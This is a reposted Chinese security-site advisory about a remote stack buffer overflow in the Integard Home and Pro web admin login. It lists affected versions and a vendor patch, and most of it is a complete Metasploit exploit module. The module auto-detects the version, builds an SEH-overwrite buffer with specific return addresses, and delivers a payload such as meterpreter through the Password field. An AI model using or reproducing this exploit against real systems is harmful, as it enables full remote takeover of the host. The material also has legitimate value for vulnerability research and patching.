当前位置:七道奇文章资讯安全技术网络技术
日期:2010-09-11 00:16:00  来源:本站整理

Integard Home和Pro HTTP恳求远程栈溢出漏洞及修复[网络技术]

赞助商链接



  本文“Integard Home和Pro HTTP恳求远程栈溢出漏洞及修复[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

影响版本:
Race River Integard Home 2.0.0.9021
Race River Integard Pro 2.2.0.9026漏洞描写:
Integard Home和Pro辨别是家用和企业级的上网内容监控和过滤系统.

Integard服务器18881端口上的管理页面存在栈溢出漏洞.远程攻击者可以通过在口令字段中供应超长字符串来触发这个溢出,招致完好掌握利用和操作系统.
<*参考
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-061-integard-home-and-pro-v2-remote-http-buffer-overflow-exploit/
http://secunia.com/advisories/41312/
*>
测试办法:

本站供应程序(办法)大概带有攻击性,仅供安全研究与讲授之用,风险自负!
class Metasploit3 < Msf::Exploit::Remote
 
    include Msf::Exploit::Remote::Tcp
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Integard Home/Pro version 2.0',
            'Description'    => %q{
                    Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
            },
            'Author'  =>
                [
                    'Lincoln',
                    'Nullthreat',
                    'rick2600',
                ],
            'License'       => MSF_LICENSE,
            'Version'       => '$Revision: $',
            'References'    =>
                [
                    ['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'thread',
                },
            'Payload'        =>
                {
                    'Space'    => 2000,
                    'BadChars'  => "\x00\x20\x26\x2f\x3d\x3f\x5c",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Privileged'     => false,
            'Targets'        =>
                [
                    [ 'Automatic Targeting',          { 'auto' => true }],
                    [ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
                    [ 'Integard Pro  2.2.0.9026', { 'Ret' => 0x0040362C,}],
                ],
            'DefaultTarget'  => 0))
 
        register_options(
            [
                Opt::RPORT(18881)
            ], self.class )
    end
 
    #Current version does not work with bind() type of payloads
    #meterpreter, windows/exec  etc works fine
 
    def exploit
        mytarget = target
        if(target['auto'])
            mytarget = nil
            print_status("[*] Automatically detecting the target...")
            connect
            get = "GET /banner.jpg HTTP/1.1\r\n\r\n"
            sock.put(get)
            data = sock.recv(1024)
                if (data =~ /Content-Length: 24584/)
                    print_status("[!] Found Version - Integard Home")
                    mytarget = self.targets[1]
                end
                if (data =~ /Content-Length: 23196/)
                    print_status("[!] Found Version - Integard Pro")
                    mytarget = self.targets[2]
                end
            sock.close
        end
        connect
        print_status("[!] Selected Target: #{mytarget.name}")
        print_status("[*] Building Buffer")
        pay = payload.encoded
        junk = rand_text_alpha_upper(3091 - pay.length)
        jmp = "\xE9\x2B\xF8\xFF\xFF"
        nseh = "\xEB\xF9\x90\x90"
        seh = [mytarget.ret].pack('V')
        buffer = junk + pay + jmp + nseh + seh
        print_status("[*] Sending Request")
        req = "POST /LoginAdmin HTTP/1.1\r\n"
        req << "Host: 192.168.2.129:18881\r\n"
        req << "Content-Length: 1074\r\n\r\n"
        req << "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
        sock.put(req)
        print_status("[*] Request Sent")
        sock.close
        handler
    end
end

厂商补钉:

Race River
----------
目前厂商已经公布了进级补钉以修复这个安全问题,请到厂商的主页下载:

http://www.integard.com.au/Release_Notes_Home.htm
http://www.integard.com.au/Release_Notes_Pro.htm


  以上是“Integard Home和Pro HTTP恳求远程栈溢出漏洞及修复[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 网络设备通过win7的虚拟wifi衔接internet的办法
  • Intel 酷睿i5 3450处理器能不能超频 怎么操作?
  • Windows7快速同享Internet无线网络衔接
  • Windows 7快速同享Internet无线网络衔接
  • 把Internet暂时文件夹移到其他位置
  • 电脑上的Internet时间同步出错办理办法
  • 举荐:配置Intel酷睿I5魔兽专用机只需人民币4000元
  • 教大家怎样卸载Internet Explorer 9浏览器?
  • <b>数据库复制技术在Internet上的实现</b>
  • Java IDE实用对比:Eclipse、NetBeans、IntelliJ
  • <b>Struts2文件上传(二) 深化FileUploadInterceptor</b>
  • Eclipse NetBeans IntelliJ的实用对比
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .